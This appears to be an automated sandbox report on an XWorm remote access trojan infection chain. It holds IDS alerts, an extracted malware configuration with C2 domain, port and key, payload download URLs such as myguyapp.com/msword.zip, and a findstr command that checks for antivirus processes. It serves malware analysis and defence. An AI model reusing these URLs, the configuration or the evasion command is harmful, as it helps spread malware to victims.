Source: Process started; Author: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5328, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 1276, ProcessName: findstr.exe

Suricata IDS alerts (Timestamp; SID; Severity; Classtype; Source IP:Port -> Destination IP:Port; Protocol):
Timestamp: 2024-12-16T01:35:52.437012+0100; SID: 2852870; Severity: 1; Classtype: Malware Command and Control Activity Detected; Source: 193.26.115.21:7007; Destination: 192.168.2.4:49994; Protocol: TCP
Timestamp: 2024-12-16T01:36:22.453200+0100; SID: 2852870; Severity: 1; Classtype: Malware Command and Control Activity Detected; Source: 193.26.115.21:7007; Destination: 192.168.2.4:49994; Protocol: TCP
Timestamp: 2024-12-16T01:36:52.453777+0100; SID: 2852870; Severity: 1; Classtype: Malware Command and Control Activity Detected; Source: 193.26.115.21:7007; Destination: 192.168.2.4:49994; Protocol: TCP
Timestamp: 2024-12-16T01:35:52.437012+0100; SID: 2852874; Severity: 1; Classtype: Malware Command and Control Activity Detected; Source: 193.26.115.21:7007; Destination: 192.168.2.4:49994; Protocol: TCP
Timestamp: 2024-12-16T01:36:22.453200+0100; SID: 2852874; Severity: 1; Classtype: Malware Command and Control Activity Detected; Source: 193.26.115.21:7007; Destination: 192.168.2.4:49994; Protocol: TCP
Timestamp: 2024-12-16T01:36:52.453777+0100; SID: 2852874; Severity: 1; Classtype: Malware Command and Control Activity Detected; Source: 193.26.115.21:7007; Destination: 192.168.2.4:49994; Protocol: TCP
Timestamp: 2024-12-16T01:35:55.067781+0100; SID: 2855924; Severity: 1; Classtype: Malware Command and Control Activity Detected; Source: 192.168.2.4:49994; Destination: 193.26.115.21:7007; Protocol: TCP


              AV Detection

              barindex
              Source: https://myguyapp.com/msword.zipAvira URL Cloud: Label: malware
              Source: 00000028.00000002.4146462832.0000000002871000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["me-work.com"], "Port": 7007, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
              Source: me-work.comVirustotal: Detection: 12%Perma Link
              Source: https://myguyapp.com/Virustotal: Detection: 5%Perma Link
              Source: https://myguyapp.com/msword.zipVirustotal: Detection: 18%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
              Source: 40.2.RegAsm.exe.5c0000.0.unpackString decryptor: me-work.com
              Source: 40.2.RegAsm.exe.5c0000.0.unpackString decryptor: 7007
              Source: 40.2.RegAsm.exe.5c0000.0.unpackString decryptor: <123456789>
              Source: 40.2.RegAsm.exe.5c0000.0.unpackString decryptor: <Xwormmm>
              Source: 40.2.RegAsm.exe.5c0000.0.unpackString decryptor: USB.exe
              Source: unknownHTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000028.00000000.3262451452.00000000004E2000.00000002.00000001.01000000.00000012.sdmp, RegAsm.exe.28.dr
              Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000028.00000000.3262451452.00000000004E2000.00000002.00000001.01000000.00000012.sdmp, RegAsm.exe.28.dr
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 15_2_004062D5 FindFirstFileW,FindClose,15_2_004062D5
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 15_2_00402E18 FindFirstFileW,15_2_00402E18
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 15_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,15_2_00406C9B
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_01044005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,28_2_01044005
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_0104494A GetFileAttributesW,FindFirstFileW,FindClose,28_2_0104494A
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_01043CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,28_2_01043CE2
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_0104C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,28_2_0104C2FF
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_0104CD14 FindFirstFileW,FindClose,28_2_0104CD14
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_0104CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,28_2_0104CD9F
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_0104F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,28_2_0104F5D8
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_0104F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,28_2_0104F735
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_0104FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,28_2_0104FA36
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 36_2_00894005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,36_2_00894005
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 36_2_0089C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,36_2_0089C2FF
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 36_2_0089494A GetFileAttributesW,FindFirstFileW,FindClose,36_2_0089494A
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 36_2_0089CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,36_2_0089CD9F
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 36_2_0089CD14 FindFirstFileW,FindClose,36_2_0089CD14
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 36_2_0089F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,36_2_0089F5D8
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 36_2_0089F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,36_2_0089F735
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 36_2_0089FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,36_2_0089FA36
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 36_2_00893CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,36_2_00893CE2
              Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
              Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
              Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\msword
              Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\msword\
              Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
              Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\

              Networking

              Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 193.26.115.21:7007 -> 192.168.2.4:49994
              Source: Network traffic | Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 193.26.115.21:7007 -> 192.168.2.4:49994
              Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49994 -> 193.26.115.21:7007
              Source: Malware configuration extractor | URLs: me-work.com
              Source: global traffic | TCP traffic: 192.168.2.4:49994 -> 193.26.115.21:7007
              Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global traffic | HTTP traffic detected: GET /c.bat HTTP/1.1 | Accept: */* | Accept-Language: en-CH | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: myguyapp.com | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /f.pdf HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: myguyapp.com | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /msword.zip HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: myguyapp.com | Connection: Keep-Alive
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 28_2_010529BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,28_2_010529BA
              Source: global traffic | DNS traffic detected: DNS query: myguyapp.com
              Source: global traffic | DNS traffic detected: DNS query: x1.i.lencr.org
              Source: global traffic | DNS traffic detected: DNS query: dwLscOsEZmpbOxr.dwLscOsEZmpbOxr
              Source: global traffic | DNS traffic detected: DNS query: me-work.com
              Source: msword.exe.12.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: msword.exe.12.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: msword.exe.12.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: msword.exe.12.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.dr | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
              Source: msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
              Source: msword.exe, 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp, msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
              Source: msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.dr | String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
              Source: msword.exe.12.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: msword.exe.12.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: msword.exe.12.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: msword.exe.12.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: msword.exe.12.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: msword.exe, 0000000F.00000000.2176944096.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe, 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe.12.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: msword.exe.12.dr | String found in binary or memory: http://ocsp.digicert.com0
              Source: msword.exe.12.dr | String found in binary or memory: http://ocsp.digicert.com0A
              Source: msword.exe.12.dr | String found in binary or memory: http://ocsp.digicert.com0C
              Source: msword.exe.12.dr | String found in binary or memory: http://ocsp.digicert.com0X
              Source: msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
              Source: msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.dr | String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
              Source: msword.exe, 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp, msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
              Source: RegAsm.exe, 00000028.00000002.4146462832.0000000002871000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
              Source: msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
              Source: msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp, DanielPulse.scr, 00000024.00000002.2248424669.00000000008F9000.00000002.00000001.01000000.00000011.sdmp, DanielPulse.scr, 00000026.00000000.2341454092.0000000000979000.00000002.00000001.01000000.00000011.sdmp, Carter.pif.19.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/J
              Source: msword.exe.12.dr | String found in binary or memory: http://www.digicert.com/CPS0
              Source: 2D85F72862B55C4EADD9E66E06947F3D0.7.dr | String found in binary or memory: http://x1.i.lencr.org/
              Source: mshta.exe, 00000000.00000003.2180407908.000000000A6A3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2191819008.000000000A6A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2178648980.000000000A69F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
              Source: tasklist.exe, 00000017.00000002.2204351341.0000000002A40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/
              Source: mshta.exe, 00000000.00000002.2189976886.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2190601115.00000000031B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2180004393.00000000031B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2178648980.000000000A72B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182996805.000000000A667000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2179829068.0000000003206000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2179505726.0000000003202000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2178147907.00000000031FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2191626498.000000000645A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2178147907.00000000031F3000.00000004.00000020.00020000.00000000.sdmp, c2.hta | String found in binary or memory: https://myguyapp.com/c.bat
              Source: mshta.exe, 00000000.00000002.2190851083.0000000003207000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2179829068.0000000003206000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2179505726.0000000003202000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2178147907.00000000031FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/c.batA
              Source: mshta.exe, 00000000.00000003.2182996805.000000000A667000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/c.batO
              Source: mshta.exe, 00000000.00000002.2190782363.00000000031F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2178147907.00000000031F3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/c.batQ;
              Source: mshta.exe, 00000000.00000003.2182501975.0000000003151000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2190431701.0000000003152000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/c.batta
              Source: RegAsm.exe, 00000028.00000002.4145039589.0000000000DF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000028.00000002.4153020954.0000000005660000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000028.00000002.4142044815.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000028.00000002.4142044815.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, c[1].bat.0.dr | String found in binary or memory: https://myguyapp.com/f.pdf
              Source: RegAsm.exe, 00000028.00000002.4142044815.0000000000A89000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/f.pdf#
              Source: cmd.exe, 0000001E.00000002.2218183562.0000000002F98000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000028.00000002.4142044815.0000000000A89000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/f.pdf&
              Source: Carter.pif, 0000001C.00000002.4142975569.00000000011E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/f.pdf6
              Source: RegAsm.exe, 00000028.00000002.4145039589.0000000000DF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/f.pdfUSERDOMAIN=PSAMNLJUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAM
              Source: tasklist.exe, 00000017.00000002.2204351341.0000000002A40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/f.pdfUSERDOMAIN=PSAMNLJUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROF
              Source: RegAsm.exe, 00000028.00000002.4142044815.0000000000A08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/f.pdfx
              Source: mshta.exe, 00000000.00000003.2182970389.000000000AB50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2191819008.000000000A712000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.2241478778.0000000002300000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.2240642451.000000000079E000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.2240497992.0000000000730000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2198754088.00000000031C8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2198184254.00000000031F9000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2198902902.00000000031FD000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2199134054.0000000003480000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2198290497.00000000031F9000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2198352988.00000000031FC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000002.2204137637.000000000283E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.2202857947.000000000283A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000002.2203915215.0000000002808000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.2203305366.000000000283A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000002.2204351341.0000000002A40000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.2203428301.000000000283D000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4142087918.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4142975569.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2259638812.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2259655331.0000000002B68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zip
              Source: RegAsm.exe, 00000028.00000002.4142044815.0000000000A89000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zipJ
              Source: tasklist.exe, 00000015.00000003.2198184254.00000000031F9000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2198325078.0000000003201000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2199134054.0000000003480000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2198974605.0000000003202000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2198290497.00000000031F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zipurl2
              Source: msword.exe, 0000000F.00000002.2240642451.0000000000824000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000003.2239272884.0000000000824000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zipurl2=httpd
              Source: RegAsm.exe, 00000028.00000002.4142044815.0000000000A89000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=PSAMNLJUSERDOMAIN_ROAMINGPR
              Source: Carter.pif, 0000001C.00000002.4142087918.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyappc
              Source: mshta.exe, 00000000.00000002.2190851083.0000000003207000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2179829068.0000000003206000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2179505726.0000000003202000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2178147907.00000000031FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/r
              Source: msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
              Source: msword.exe, 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp | String found in binary or memory: https://www.globalsign.com/rea
              Source: msword.exe, 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp | String found in binary or memory: https://www.globalsign.com/reancel
              Source: Carter.pif.19.dr | String found in binary or memory: https://www.globalsign.com/repository/0
              Source: msword.exe, 0000000F.00000003.2182204354.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.2217691518.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000002.4146223730.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001C.00000003.3316964801.0000000003C37000.00000004.00000800.00020000.00000000.sdmp, Carter.pif.19.dr | String found in binary or memory: https://www.globalsign.com/repository/06
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
